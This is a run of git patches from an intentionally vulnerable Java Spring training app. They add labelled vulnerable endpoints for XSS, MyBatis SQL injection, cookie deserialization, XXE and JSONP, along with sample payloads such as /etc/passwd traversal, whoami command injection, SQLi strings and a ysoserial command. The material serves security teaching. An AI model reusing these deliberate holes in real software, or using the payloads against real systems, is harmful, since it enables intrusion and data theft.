- * Vuln:   3.10 or below exist xxe vuln. 3.14 or above exist dos vuln. So 3.15 or above is safe version.
+ * Vuln:   3.10 or below exist xxe vuln. 3.14 or below exist dos vuln. So 3.15 or above is safe version.
  *
  * @author JoyChou @2019-09-05
  */
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index cab90aad..e3a3d25e 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -13,7 +13,9 @@
         <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
         <a th:href="@{/sqli/jdbc/vul?username=joychou}">SqlInject</a>&nbsp;&nbsp;
         <a th:href="@{/ssrf/urlConnection?url=file:///etc/passwd}">SSRF</a>&nbsp;&nbsp;
-        <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>
+        <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
+        <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
+        <a th:href="@{/xlsx-streamer/upload}">xlsx-streamer XXE</a>
     </p>
     <p>...</p>
     <a th:href="@{/logout}">logout</a>

From 562b95623cc58b1e7ed1af3e75ee3b9101b55f72 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 12 Sep 2019 17:13:35 +0800
Subject: [PATCH 061/108] add a jsonp case

---
 .../java/org/joychou/controller/CORS.java     |  2 +-
 .../org/joychou/controller/jsonp/JSONP.java   | 29 +++++++++++++++----
 .../joychou/controller/jsonp/JSONPAdvice.java |  1 +
 3 files changed, 26 insertions(+), 6 deletions(-)

diff --git a/src/main/java/org/joychou/controller/CORS.java b/src/main/java/org/joychou/controller/CORS.java
index bf93c7ce..35d2a178 100644
--- a/src/main/java/org/joychou/controller/CORS.java
+++ b/src/main/java/org/joychou/controller/CORS.java
@@ -57,7 +57,7 @@ public String seccode(HttpServletRequest request, HttpServletResponse response)
         }
         response.setHeader("Access-Control-Allow-Origin", origin);
         response.setHeader("Access-Control-Allow-Credentials", "true");
-        return JSONP.getUserInfo(request);
+        return JSONP.getUserInfo2JsonStr(request);
     }
 
 
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java
index 4cd680b3..34980530 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONP.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java
@@ -3,10 +3,13 @@
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.JSONObject;
 
+import com.netflix.ribbon.proxy.annotation.Http;
 import org.joychou.security.SecurityUtil;
 import org.springframework.http.MediaType;
 import org.springframework.security.web.csrf.CsrfToken;
 import org.springframework.web.bind.annotation.*;
+import org.springframework.web.servlet.ModelAndView;
+import org.springframework.web.servlet.view.json.MappingJackson2JsonView;
 
 import javax.servlet.http.HttpServletRequest;
 import java.security.Principal;
@@ -27,7 +30,7 @@ public class JSONP {
 
 
     // get current login username
-    public static String getUserInfo(HttpServletRequest request) {
+    public static String getUserInfo2JsonStr(HttpServletRequest request) {
         Principal principal = request.getUserPrincipal();
 
         String username = principal.getName();
@@ -46,7 +49,7 @@ public static String getUserInfo(HttpServletRequest request) {
     @RequestMapping(value = "/referer", produces = "application/javascript")
     private String referer(HttpServletRequest request) {
         String callback = request.getParameter("callback");
-        return callback + "(" + getUserInfo(request) + ")";
+        return callback + "(" + getUserInfo2JsonStr(request) + ")";
     }
 
     /**
@@ -64,7 +67,7 @@ private String emptyReferer(HttpServletRequest request) {
         }
 
         String callback = request.getParameter("callback");
-        return callback + "(" + getUserInfo(request) + ")";
+        return callback + "(" + getUserInfo2JsonStr(request) + ")";
     }
 
     /**
@@ -77,10 +80,26 @@ private String emptyReferer(HttpServletRequest request) {
      */
     @RequestMapping(value = "/advice", produces = MediaType.APPLICATION_JSON_VALUE)
     public JSONObject advice(HttpServletRequest request) {
-        return JSON.parseObject(getUserInfo(request));
+        return JSON.parseObject(getUserInfo2JsonStr(request));
+    }
+
 
+    /**
+     * http://localhost:8080/jsonp/mappingJackson2JsonView?callback=test
+     * Reference: https://p0sec.net/index.php/archives/122/ from p0
+     * Affected version:  java-sec-code test case version: 4.3.6
+     *     - Spring Framework 5.0 to 5.0.6
+     *     - Spring Framework 4.1 to 4.3.17
+     */
+    @RequestMapping(value = "/mappingJackson2JsonView", produces = MediaType.APPLICATION_JSON_VALUE)
+    public ModelAndView mappingJackson2JsonView(HttpServletRequest req) {
+        ModelAndView view = new ModelAndView(new MappingJackson2JsonView());
+        Principal principal = req.getUserPrincipal();
+        view.addObject("username", principal.getName() );
+        return view;
     }
 
+
     /**
      * Safe code.
      * http://localhost:8080/jsonp/sec?callback=test
@@ -94,7 +113,7 @@ private String safecode(HttpServletRequest request) {
         }
 
         String callback = request.getParameter("callback");
-        return callback + "(" + getUserInfo(request) + ")";
+        return callback + "(" + getUserInfo2JsonStr(request) + ")";
     }
 
 
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
index 094070a4..f6c591f6 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java
@@ -12,4 +12,5 @@ public class JSONPAdvice extends AbstractJsonpResponseBodyAdvice {
     public JSONPAdvice(@Value("${joychou.security.jsonp.callback}") String[] callback) {
         super(callback);  // Can set multiple paramNames
     }
+
 }

From d0ece30140e9d8ff0fa976d06801da8e26617f1b Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 16 Sep 2019 11:48:30 +0800
Subject: [PATCH 062/108] update deserialize getcookie method

---
 .../org/joychou/controller/CommandInject.java |  8 +--
 .../org/joychou/controller/Deserialize.java   | 60 ++++++++-----------
 .../org/joychou/controller/XStreamRce.java    |  4 +-
 src/main/java/org/joychou/controller/XXE.java | 36 +++++------
 .../{utils/Tools.java => util/WebUtils.java}  |  4 +-
 5 files changed, 51 insertions(+), 61 deletions(-)
 rename src/main/java/org/joychou/{utils/Tools.java => util/WebUtils.java} (92%)

diff --git a/src/main/java/org/joychou/controller/CommandInject.java b/src/main/java/org/joychou/controller/CommandInject.java
index bf4f6515..f4901b87 100644
--- a/src/main/java/org/joychou/controller/CommandInject.java
+++ b/src/main/java/org/joychou/controller/CommandInject.java
@@ -1,7 +1,7 @@
 package org.joychou.controller;
 
 import org.joychou.security.SecurityUtil;
-import org.joychou.utils.Tools;
+import org.joychou.util.WebUtils;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.web.bind.annotation.GetMapping;
@@ -28,7 +28,7 @@ public static String codeInject(String filepath) throws IOException {
         ProcessBuilder builder = new ProcessBuilder(cmdList);
         builder.redirectErrorStream(true);
         Process process = builder.start();
-        return Tools.convertStreamToString(process.getInputStream());
+        return WebUtils.convertStreamToString(process.getInputStream());
     }
 
     /**
@@ -46,7 +46,7 @@ public String codeInjectHost(HttpServletRequest request) throws IOException {
         ProcessBuilder builder = new ProcessBuilder(cmdList);
         builder.redirectErrorStream(true);
         Process process = builder.start();
-        return Tools.convertStreamToString(process.getInputStream());
+        return WebUtils.convertStreamToString(process.getInputStream());
     }
 
     @GetMapping("/codeinject/sec")
@@ -59,6 +59,6 @@ public static String codeInjectSec(String filepath) throws IOException {
         ProcessBuilder builder = new ProcessBuilder(cmdList);
         builder.redirectErrorStream(true);
         Process process = builder.start();
-        return Tools.convertStreamToString(process.getInputStream());
+        return WebUtils.convertStreamToString(process.getInputStream());
     }
 }
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
index d597087c..57e0a6b7 100644
--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -1,6 +1,5 @@
 package org.joychou.controller;
 
-import org.apache.commons.lang.StringUtils;
 import org.joychou.security.AntObjectInputStream;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
@@ -11,9 +10,12 @@
 import javax.servlet.http.HttpServletRequest;
 import java.io.ByteArrayInputStream;
 import java.io.IOException;
+import java.io.InvalidClassException;
 import java.io.ObjectInputStream;
 import java.util.Base64;
 
+import static org.springframework.web.util.WebUtils.getCookie;
+
 /**
  * Deserialize RCE using Commons-Collections gadget.
  *
@@ -23,8 +25,8 @@
 @RequestMapping("/deserialize")
 public class Deserialize {
 
-
-    private static Logger logger= LoggerFactory.getLogger(Deserialize.class);
+    private static String cookieName = "rememberMe";
+    protected final Logger logger = LoggerFactory.getLogger(this.getClass());
 
     /**
      * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64
@@ -33,27 +35,18 @@ public class Deserialize {
      * http://localhost:8080/deserialize/rememberMe/vul
      */
     @RequestMapping("/rememberMe/vul")
-    public static String rememberMeVul(HttpServletRequest request)
+    public String rememberMeVul(HttpServletRequest request)
             throws IOException, ClassNotFoundException {
 
-        Cookie[] cookies = request.getCookies();
-        String rememberMe = "";
-
-        if (null == cookies) {
-            logger.info("No cookies.");
-        } else {
-            for (Cookie cookie : cookies) {
-                if ( cookie.getName().equals("rememberMe") ) {
-                    rememberMe = cookie.getValue();
-                }
-            }
-        }
+        Cookie cookie = getCookie(request, cookieName);
 
-        if (StringUtils.isBlank(rememberMe) ) {
+        if (null == cookie){
             return "No rememberMe cookie. Right?";
         }
 
+        String rememberMe = cookie.getValue();
         byte[] decoded = Base64.getDecoder().decode(rememberMe);
+
         ByteArrayInputStream bytes = new ByteArrayInputStream(decoded);
         ObjectInputStream in = new ObjectInputStream(bytes);
         in.readObject();
@@ -68,32 +61,29 @@ public static String rememberMeVul(HttpServletRequest request)
      * http://localhost:8080/deserialize/rememberMe/security
      */
     @RequestMapping("/rememberMe/security")
-    public static String rememberMeBlackClassCheck(HttpServletRequest request)
+    public String rememberMeBlackClassCheck(HttpServletRequest request)
             throws IOException, ClassNotFoundException {
 
-        Cookie[] cookies = request.getCookies();
-        String rememberMe = "";
-
-        if (null == cookies) {
-            logger.info("No cookies in /rememberMe/security");
-        } else {
-            for (Cookie cookie : cookies) {
-                if ( cookie.getName().equals("rememberMe") ) {
-                    rememberMe = cookie.getValue();
-                }
-            }
-        }
+        Cookie cookie = getCookie(request, cookieName);
 
-        if (StringUtils.isBlank(rememberMe) ) {
+        if (null == cookie){
             return "No rememberMe cookie. Right?";
         }
-
+        String rememberMe = cookie.getValue();
         byte[] decoded = Base64.getDecoder().decode(rememberMe);
+
         ByteArrayInputStream bytes = new ByteArrayInputStream(decoded);
-        AntObjectInputStream in = new AntObjectInputStream(bytes);
-        in.readObject();
-        in.close();
+
+        try{
+            AntObjectInputStream in = new AntObjectInputStream(bytes);  // throw InvalidClassException
+            in.readObject();
+            in.close();
+        } catch (InvalidClassException e) {
+            logger.info(e.toString());
+            return e.toString();
+        }
 
         return "I'm very OK.";
     }
+
 }
diff --git a/src/main/java/org/joychou/controller/XStreamRce.java b/src/main/java/org/joychou/controller/XStreamRce.java
index d4c35872..20b96147 100644
--- a/src/main/java/org/joychou/controller/XStreamRce.java
+++ b/src/main/java/org/joychou/controller/XStreamRce.java
@@ -3,7 +3,7 @@
 import com.thoughtworks.xstream.XStream;
 import com.thoughtworks.xstream.io.xml.DomDriver;
 import org.joychou.dao.User;
-import org.joychou.utils.Tools;
+import org.joychou.util.WebUtils;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RestController;
 
@@ -22,7 +22,7 @@ public class XStreamRce {
      */
     @PostMapping("/xstream")
     public String parseXml(HttpServletRequest request) throws Exception{
-        String xml = Tools.getRequestBody(request);
+        String xml = WebUtils.getRequestBody(request);
         XStream xstream = new XStream(new DomDriver());
         xstream.fromXML(xml);
         return "xstream";
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 79133f16..7347523e 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -19,7 +19,7 @@
 import org.xml.sax.helpers.DefaultHandler;
 import org.apache.commons.digester3.Digester;
 import org.jdom2.input.SAXBuilder;
-import org.joychou.utils.Tools;
+import org.joychou.util.WebUtils;
 
 /**
  * Java xxe vul and safe code.
@@ -34,7 +34,7 @@ public class XXE {
     @RequestMapping(value = "/xmlReader", method = RequestMethod.POST)
     public String xxe_xmlReader(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
             XMLReader xmlReader = XMLReaderFactory.createXMLReader();
             xmlReader.parse(new InputSource(new StringReader(xml_con)));  // parse xml
@@ -49,7 +49,7 @@ public String xxe_xmlReader(HttpServletRequest request) {
     @RequestMapping(value = "/xmlReader_fix", method = RequestMethod.POST)
     public String xxe_xmlReader_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
 
             XMLReader xmlReader = XMLReaderFactory.createXMLReader();
@@ -71,7 +71,7 @@ public String xxe_xmlReader_fix(HttpServletRequest request) {
     @RequestMapping(value = "/SAXBuilder", method = RequestMethod.POST)
     public String xxe_SAXBuilder(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXBuilder builder = new SAXBuilder();
@@ -86,7 +86,7 @@ public String xxe_SAXBuilder(HttpServletRequest request) {
     @RequestMapping(value = "/SAXBuilder_fix", method = RequestMethod.POST)
     public String xxe_SAXBuilder_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXBuilder builder = new SAXBuilder();
@@ -104,7 +104,7 @@ public String xxe_SAXBuilder_fix(HttpServletRequest request) {
     @RequestMapping(value = "/SAXReader", method = RequestMethod.POST)
     public String xxe_SAXReader(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXReader reader = new SAXReader();
@@ -120,7 +120,7 @@ public String xxe_SAXReader(HttpServletRequest request) {
     @RequestMapping(value = "/SAXReader_fix", method = RequestMethod.POST)
     public String xxe_SAXReader_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXReader reader = new SAXReader();
@@ -139,7 +139,7 @@ public String xxe_SAXReader_fix(HttpServletRequest request) {
     @RequestMapping(value = "/SAXParser", method = RequestMethod.POST)
     public String xxe_SAXParser(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXParserFactory spf = SAXParserFactory.newInstance();
@@ -157,7 +157,7 @@ public String xxe_SAXParser(HttpServletRequest request) {
     @RequestMapping(value = "/SAXParser_fix", method = RequestMethod.POST)
     public String xxe_SAXParser_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXParserFactory spf = SAXParserFactory.newInstance();
@@ -177,7 +177,7 @@ public String xxe_SAXParser_fix(HttpServletRequest request) {
     @RequestMapping(value = "/Digester", method = RequestMethod.POST)
     public String xxe_Digester(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
 
             Digester digester = new Digester();
@@ -193,7 +193,7 @@ public String xxe_Digester(HttpServletRequest request) {
     @RequestMapping(value = "/Digester_fix", method = RequestMethod.POST)
     public String xxe_Digester_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
 
             Digester digester = new Digester();
@@ -214,7 +214,7 @@ public String xxe_Digester_fix(HttpServletRequest request) {
     @RequestMapping(value = "/DocumentBuilder_return", method = RequestMethod.POST)
     public String xxeDocumentBuilderReturn(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
@@ -247,7 +247,7 @@ public String xxeDocumentBuilderReturn(HttpServletRequest request) {
     @RequestMapping(value = "/DocumentBuilder", method = RequestMethod.POST)
     public String DocumentBuilder(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
@@ -283,7 +283,7 @@ public String DocumentBuilder(HttpServletRequest request) {
     @RequestMapping(value = "/DocumentBuilder_fix", method = RequestMethod.POST)
     public String xxe_DocumentBuilder_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
@@ -307,7 +307,7 @@ public String xxe_DocumentBuilder_fix(HttpServletRequest request) {
     @RequestMapping(value = "/DocumentBuilder_xinclude", method = RequestMethod.POST)
     public String xxe_xinclude_DocumentBuilder(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
@@ -343,7 +343,7 @@ public String xxe_xinclude_DocumentBuilder(HttpServletRequest request) {
     @RequestMapping(value = "/DocumentBuilder_xinclude_fix", method = RequestMethod.POST)
     public String xxe_xinclude_DocumentBuilder_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
 
@@ -382,7 +382,7 @@ public String xxe_xinclude_DocumentBuilder_fix(HttpServletRequest request) {
     @PostMapping("/XMLReader/vul")
     public String XMLReaderVul(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
             SAXParserFactory spf = SAXParserFactory.newInstance();
             SAXParser saxParser = spf.newSAXParser();
@@ -399,7 +399,7 @@ public String XMLReaderVul(HttpServletRequest request) {
     @PostMapping("/XMLReader/fixed")
     public String XMLReaderSec(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getRequestBody(request);
+            String xml_con = WebUtils.getRequestBody(request);
             System.out.println(xml_con);
             SAXParserFactory spf = SAXParserFactory.newInstance();
             SAXParser saxParser = spf.newSAXParser();
diff --git a/src/main/java/org/joychou/utils/Tools.java b/src/main/java/org/joychou/util/WebUtils.java
similarity index 92%
rename from src/main/java/org/joychou/utils/Tools.java
rename to src/main/java/org/joychou/util/WebUtils.java
index 7e1b1431..21cdcd53 100644
--- a/src/main/java/org/joychou/utils/Tools.java
+++ b/src/main/java/org/joychou/util/WebUtils.java
@@ -1,10 +1,10 @@
-package org.joychou.utils;
+package org.joychou.util;
 
 import javax.servlet.http.HttpServletRequest;
 import java.io.IOException;
 import java.io.InputStream;
 
-public class Tools {
+public class WebUtils {
 
     // Get request body.
     public static String getRequestBody(HttpServletRequest request) throws IOException {

From 59a72efaf04fc4ea603ef0b910bd4c6f9f3dd3c3 Mon Sep 17 00:00:00 2001
From: Anemone95 <x565178035@126.com>
Date: Tue, 15 Oct 2019 15:07:46 +0800
Subject: [PATCH 063/108] 19/10/15 add more xss&sql vuln code

---
 .../java/org/joychou/controller/SQLI.java     | 47 ++++++++++---
 src/main/java/org/joychou/controller/XSS.java | 67 +++++++++++++++++--
 .../java/org/joychou/mapper/UserMapper.java   |  8 +++
 src/main/resources/application.properties     |  3 +-
 src/main/resources/create_db.sql              |  9 +++
 src/main/resources/mapper/UserMapper.xml      |  5 ++
 6 files changed, 121 insertions(+), 18 deletions(-)
 create mode 100644 src/main/resources/create_db.sql

diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index a4344b85..5fcb8a16 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -4,10 +4,13 @@
 import org.joychou.mapper.UserMapper;
 import org.joychou.dao.User;
 import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.beans.factory.annotation.Value;
+import org.springframework.context.annotation.Configuration;
 import org.springframework.web.bind.annotation.*;
 
 import javax.servlet.http.HttpServletRequest;
 import java.sql.*;
+import java.util.List;
 
 
 /**
@@ -16,14 +19,18 @@
  * @desc    SQL Injection
  */
 
+@SuppressWarnings("Duplicates")
 @RestController
 @RequestMapping("/sqli")
 public class SQLI {
 
     private static String driver = "com.mysql.jdbc.Driver";
-    private static String url = "jdbc:mysql://localhost:3306/java_sec_code";
-    private static String user = "root";
-    private static String password = "woshishujukumima";
+    @Value("${spring.datasource.url}")
+    private String url;
+    @Value("${spring.datasource.username}")
+    private String user;
+    @Value("${spring.datasource.password}")
+    private String password;
 
     @Autowired
     private UserMapper userMapper;
@@ -36,7 +43,7 @@ public class SQLI {
      * @param username username
      */
     @RequestMapping("/jdbc/vul")
-    public static String jdbc_sqli_vul(@RequestParam("username") String username){
+    public String jdbc_sqli_vul(@RequestParam("username") String username){
         String result = "";
         try {
             Class.forName(driver);
@@ -88,7 +95,7 @@ public static String jdbc_sqli_vul(@RequestParam("username") String username){
      * @param username username
      */
     @RequestMapping("/jdbc/sec")
-    public static String jdbc_sqli_sec(@RequestParam("username") String username){
+    public String jdbc_sqli_sec(@RequestParam("username") String username){
 
         String result = "";
         try {
@@ -134,6 +141,28 @@ public static String jdbc_sqli_sec(@RequestParam("username") String username){
         return result;
     }
 
+    /**
+     * vul code
+     * http://localhost:8080/sqli/mybatis/vul01?username=joychou' or '1'='1
+     *
+     * @param username username
+     */
+    @GetMapping("/mybatis/vul01")
+    public List<User> mybatis_vul1(@RequestParam("username") String username) {
+        return userMapper.findByUserNameVul(username);
+    }
+
+    /**
+     * vul code
+     * http://localhost:8080/sqli/mybatis/vul02?username=joychou' or '1'='1' %23
+     *
+     * @param username username
+     */
+    @GetMapping("/mybatis/vul02")
+    public List<User> mybatis_vul2(@RequestParam("username") String username) {
+        return userMapper.findByUserNameVul2(username);
+    }
+
 
     /**
      * security code
@@ -142,12 +171,10 @@ public static String jdbc_sqli_sec(@RequestParam("username") String username){
      * @param username username
      */
     @GetMapping("/mybatis/sec01")
-    public User mybatis_vul1(@RequestParam("username") String username) {
+    public User mybatis_sec1(@RequestParam("username") String username) {
         return userMapper.findByUserName(username);
     }
 
-
-
     /**
      * security code
      * http://localhost:8080/sqli/mybatis/sec02?id=1
@@ -155,7 +182,7 @@ public User mybatis_vul1(@RequestParam("username") String username) {
      * @param id id
      */
     @GetMapping("/mybatis/sec02")
-    public User mybatis_v(@RequestParam("id") Integer id) {
+    public User mybatis_sec2(@RequestParam("id") Integer id) {
         return userMapper.findById(id);
     }
 
@@ -165,7 +192,7 @@ public User mybatis_v(@RequestParam("id") Integer id) {
      * http://localhost:8080/sqli/mybatis/sec03
      **/
     @GetMapping("/mybatis/sec03")
-    public User mybatis_vul2() {
+    public User mybatis_sec3() {
         return userMapper.OrderByUsername();
     }
 
diff --git a/src/main/java/org/joychou/controller/XSS.java b/src/main/java/org/joychou/controller/XSS.java
index 70d4302d..fcd5d7f5 100644
--- a/src/main/java/org/joychou/controller/XSS.java
+++ b/src/main/java/org/joychou/controller/XSS.java
@@ -1,11 +1,22 @@
 package org.joychou.controller;
 
 import org.apache.commons.lang.StringUtils;
+import org.joychou.dao.User;
+import org.joychou.mapper.UserMapper;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.beans.factory.annotation.Value;
 import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.CookieValue;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 
+import javax.annotation.Resource;
+import javax.servlet.http.Cookie;
 import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.sql.Connection;
+import java.sql.DriverManager;
+import java.sql.Statement;
 
 /**
  * @author   JoyChou (joychou@joychou.org)
@@ -16,15 +27,59 @@
 @Controller
 @RequestMapping("/xss")
 public class XSS {
-    @RequestMapping("/print")
+
+    /**
+     * Vul Code.
+     * ReflectXSS
+     * http://localhost:8080/xss/reflect?xss=<script>alert(1)</script>
+     *
+     * @param xss unescape string
+     */
+    @RequestMapping("/reflect")
+    @ResponseBody
+    public static String reflect(String xss)
+    {
+        return xss;
+    }
+
+    /**
+     * Vul Code.
+     * StoredXSS Step1
+     * http://localhost:8080/xss/stored/store?xss=<script>alert(1)</script>
+     *
+     * @param xss unescape string
+     */
+    @RequestMapping("/stored/store")
     @ResponseBody
-    public static String ssrf_URLConnection(HttpServletRequest request)
+    public String store(String xss, HttpServletResponse response)
     {
-        String con = request.getParameter("con");
-        return con;
+        Cookie cookie = new Cookie("xss", xss);
+        response.addCookie(cookie);
+        return "Set param into cookie";
+    }
 
-        // fix code
-        // return encode(con);
+    /**
+     * Vul Code.
+     * StoredXSS Step2
+     * http://localhost:8080/xss/stored/show
+     *
+     * @param xss unescape string
+     */
+    @RequestMapping("/stored/show")
+    @ResponseBody
+    public String show(@CookieValue("xss") String xss)
+    {
+        return xss;
+    }
+    /**
+     * safe Code.
+     * http://localhost:8080/xss/safe
+     *
+     */
+    @RequestMapping("/safe")
+    @ResponseBody
+    public static String safe(String xss){
+        return encode(xss);
     }
 
     public static String encode(String origin) {
diff --git a/src/main/java/org/joychou/mapper/UserMapper.java b/src/main/java/org/joychou/mapper/UserMapper.java
index 36c2f734..962f465d 100644
--- a/src/main/java/org/joychou/mapper/UserMapper.java
+++ b/src/main/java/org/joychou/mapper/UserMapper.java
@@ -5,6 +5,8 @@
 import org.apache.ibatis.annotations.Select;
 import org.joychou.dao.User;
 
+import java.util.List;
+
 @Mapper
 public interface UserMapper {
 
@@ -15,7 +17,13 @@ public interface UserMapper {
     @Select("select * from users where username = #{username}")
     User findByUserName(@Param("username") String username);
 
+    @Select("select * from users where username = '${username}'")
+    List<User> findByUserNameVul(@Param("username") String username);
+
+    List<User> findByUserNameVul2(String username);
+
     User findById(Integer id);
 
     User OrderByUsername();
+
 }
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 25ad5e97..d144baa5 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,11 +1,10 @@
 
-spring.datasource.url=jdbc:mysql://localhost:3306/java_sec_code?AllowPublicKeyRetrieval=true&useSSL=false
+spring.datasource.url=jdbc:mysql://localhost:3306/java_sec_code?AllowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC
 spring.datasource.username=root
 spring.datasource.password=woshishujukumima
 spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
 mybatis.mapper-locations=classpath:mapper/*.xml
 
-
 # Spring Boot Actuator Vulnerable Config
 management.security.enabled=false
 # logging.config=classpath:logback-online.xml
diff --git a/src/main/resources/create_db.sql b/src/main/resources/create_db.sql
new file mode 100644
index 00000000..350b24f1
--- /dev/null
+++ b/src/main/resources/create_db.sql
@@ -0,0 +1,9 @@
+USE `java_sec_code`;
+CREATE TABLE IF NOT EXISTS `users`(
+   `id` INT UNSIGNED AUTO_INCREMENT,
+   `username` VARCHAR(255) NOT NULL,
+   `password` VARCHAR(255) NOT NULL,
+   PRIMARY KEY (`id`)
+)ENGINE=InnoDB DEFAULT CHARSET=utf8;
+INSERT INTO `users` VALUES (1, 'admin', 'admin123');
+INSERT INTO `users` VALUES (2, 'joychou', 'joychou123');
diff --git a/src/main/resources/mapper/UserMapper.xml b/src/main/resources/mapper/UserMapper.xml
index dd88f424..df4344e6 100644
--- a/src/main/resources/mapper/UserMapper.xml
+++ b/src/main/resources/mapper/UserMapper.xml
@@ -13,10 +13,15 @@
 	    <!--select * from users where username = #{username}-->
     <!--</select>-->
 
+    <select id="findByUserNameVul2" parameterType="String" resultMap="User">
+        select * from users where username like '%${_parameter}%'
+    </select>
+
     <select id="findById" resultMap="User">
         select * from users where id = #{id}
     </select>
 
+
     <select id="OrderByUsername" resultMap="User">
         select * from users order by id asc limit 1
     </select>

From da5ea84b45b040a6301378dfc73ba87d0a592cae Mon Sep 17 00:00:00 2001
From: Anemone95 <x565178035@126.com>
Date: Tue, 15 Oct 2019 15:10:26 +0800
Subject: [PATCH 064/108] 19/10/15 rm unuseful code

---
 src/main/java/org/joychou/controller/SQLI.java | 2 --
 1 file changed, 2 deletions(-)

diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index 5fcb8a16..9275593c 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -5,10 +5,8 @@
 import org.joychou.dao.User;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
-import org.springframework.context.annotation.Configuration;
 import org.springframework.web.bind.annotation.*;
 
-import javax.servlet.http.HttpServletRequest;
 import java.sql.*;
 import java.util.List;
 

From 98212169c7425ca4acb1e742258887f552f73849 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Sat, 2 Nov 2019 11:01:53 +0800
